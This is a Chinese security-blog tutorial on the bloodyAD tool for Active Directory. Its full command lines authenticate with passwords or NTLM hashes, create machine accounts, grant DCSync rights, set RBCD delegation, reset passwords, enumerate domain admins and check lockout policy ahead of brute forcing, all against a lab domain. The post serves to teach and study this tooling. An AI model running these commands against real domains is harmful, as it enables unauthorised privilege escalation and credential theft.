使用bloodyAD对域属性进行查询与修改

admin
admin
admin
138635
文章
114
评论
2022年9月8日15:11:45评论43 views字数 3114阅读10分22秒阅读模式

对域属性进行查询与修改

使用bloody AD

使用bloodyAD对域属性进行查询与修改
使用bloodyAD对域属性进行查询与修改


使用bloodyAD对域属性进行查询与修改


使用bloodyAD对域属性进行查询与修改

项目地址:

https://github.com/CravateRouge/bloodyAD


该工具有如下一些功能:


- delObject :删除对象

- addObjectToGroup 

- addForeignObjectToGroup 

- delObjectFromGroup 

- setShadowCredentials 

- setGenericAll 

- setOwner 

- setRbcd 

- setDCSync 

- setUserAccountControl





使用bloodyAD对域属性进行查询与修改
1
 认证

使用-u参数指定用户,-p参数指定明文密码或Hash。


使用bloodyAD对域属性进行查询与修改
1

#使用test用户,密码为P@ss1234

-u test -p P@ss1234

#使用win7机器账号和Hash认证

-u win7$ -p aad3b435b51404ee

aad3b435b51404ee:53ebb01b78

a294aec70afe9a068be55d





使用bloodyAD对域属性进行查询与修改
2
新建机器用户
使用普通域用户即可创建机器用户machine$,密码为root。

使用bloodyAD对域属性进行查询与修改
1

python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 addComputer machine 'root'

使用bloodyAD对域属性进行查询与修改





使用bloodyAD对域属性进行查询与修改
3
修改对象属性
执行如下命令修改指定对象的dNSHostName属性为DC01.xie.com。

使用bloodyAD对域属性进行查询与修改
1

python3 bloodyAD.py -d xie.com -u 

test -p P@ss1234 --host 10.211.55.4 setAttribute 'CN=machine3,CN=Computers,

DC=xie,DC=com' dNSHostName 

'["DC01.xie.com"]'

使用bloodyAD对域属性进行查询与修改






使用bloodyAD对域属性进行查询与修改
4
修改用户的密码
修改用户hack的密码为P@ssword1234。

使用bloodyAD对域属性进行查询与修改
1

python3 bloodyAD.py -d xie.com -u administrator -p P@ssword1234 --host 10.211.55.4 changePassword  hack 'P@ssword1234'





使用bloodyAD对域属性进行查询与修改
5
添加/移除DCSync


使用bloodyAD对域属性进行查询与修改


使用bloodyAD对域属性进行查询与修改
1

#给域用户hack添加DCSync

python3 bloodyAD.py -d xie.com -u Administrator -d bloody -p P@ssword1234 --host 10.211.55.4 setDCSync hack

#移除域用户hack的DCSync

python3 bloodyAD.py -d xie.com -u Administrator -d bloody -p P@ssword1234 --host 10.211.55.4 setDCSync hack False


使用bloodyAD对域属性进行查询与修改





使用bloodyAD对域属性进行查询与修改
6
添加/移除RBCD

使用bloodyAD对域属性进行查询与修改


使用bloodyAD对域属性进行查询与修改
1

#添加机器账号machine对机器win10的RBCD

python3 bloodyAD.py -d xie.com -u Administrator -d bloody -p P@ssword1234 --host 10.211.55.4 setRbcd machine win10$

#移除机器账号machine对机器win10的RBCD

python3 bloodyAD.py -d xie.com -u Administrator -d bloody -p P@ssword1234 --host 10.211.55.4 setRbcd machine win10$ False


使用bloodyAD对域属性进行查询与修改





使用bloodyAD对域属性进行查询与修改
7
查询对象

使用bloodyAD对域属性进行查询与修改

查询域内所有用户


使用bloodyAD对域属性进行查询与修改
1

python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getChildObjects 'CN=Users,DC=xie,DC=com' user


使用bloodyAD对域属性进行查询与修改


使用bloodyAD对域属性进行查询与修改

查询域内所有机器


使用bloodyAD对域属性进行查询与修改
2

python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getChildObjects 'CN=Computers,DC=xie,DC=com' user


使用bloodyAD对域属性进行查询与修改


使用bloodyAD对域属性进行查询与修改

查询域管/企业管理员


使用bloodyAD对域属性进行查询与修改
3

#查询域管

python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'CN=Domain Admins,CN=Users,DC=xie,DC=com' member

#查询企业管理员

python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'CN=Enterprise Admins,CN=Users,DC=xie,DC=com' member


使用bloodyAD对域属性进行查询与修改



使用bloodyAD对域属性进行查询与修改

查询域的所有Container容器


使用bloodyAD对域属性进行查询与修改
4

python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getChildObjects 'DC=xie,DC=com' container


使用bloodyAD对域属性进行查询与修改



使用bloodyAD对域属性进行查询与修改

查询指定对象属性


使用bloodyAD对域属性进行查询与修改
5

#查询指定对象所有属性

python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'CN=machine4,CN=Computers,DC=xie,DC=com'

python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getObjectAttributes CN=machine4

#查询指定对象指定servicePrincipalName属性

python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'CN=machine4,CN=Computers,DC=xie,DC=com' servicePrincipalName


使用bloodyAD对域属性进行查询与修改


使用bloodyAD对域属性进行查询与修改



使用bloodyAD对域属性进行查询与修改

查询域的MAQ属性


使用bloodyAD对域属性进行查询与修改
6

python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'DC=xie,DC=com' ms-DS-MachineAccountQuota


使用bloodyAD对域属性进行查询与修改



使用bloodyAD对域属性进行查询与修改

查询域的密码锁定策略


如下图,目标域的密码锁定策略是5,当错误大于5次时,用户被锁定。当该值为0时,说明没密码锁定策略,可以进行爆破。


使用bloodyAD对域属性进行查询与修改
7

python3 bloodyAD.py -d xie.com -u hack -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'DC=xie,DC=com' LockoutThreshold


使用bloodyAD对域属性进行查询与修改



使用bloodyAD对域属性进行查询与修改

查询域的密码锁定时间


使用bloodyAD对域属性进行查询与修改
8

python3 bloodyAD.py -d xie.com -u hack -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'DC=xie,DC=com' lockoutDuration


使用bloodyAD对域属性进行查询与修改



使用bloodyAD对域属性进行查询与修改

查询域的密码长度最小值


使用bloodyAD对域属性进行查询与修改
9

python3 bloodyAD.py -d xie.com -u hack -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'DC=xie,DC=com' minPwdLength


使用bloodyAD对域属性进行查询与修改



使用bloodyAD对域属性进行查询与修改

查询域功能级别


使用bloodyAD对域属性进行查询与修改
10

python3 bloodyAD.py -d xie.com -u hack -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'DC=xie,DC=com' msDS-Behavior-Version


使用bloodyAD对域属性进行查询与修改




使用bloodyAD对域属性进行查询与修改
END




原文始发于微信公众号(谢公子学安全):使用bloodyAD对域属性进行查询与修改

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月8日15:11:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   使用bloodyAD对域属性进行查询与修改https://cn-sec.com/archives/1286093.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息

Copyright ©  CN-SEC中文网  版权所有. CN-SEC.COM
  • 目录

  • 在线咨询

    13688888888
    QQ在线咨询

    微信

    微信
  • CN-SEC 中文网

    本页二维码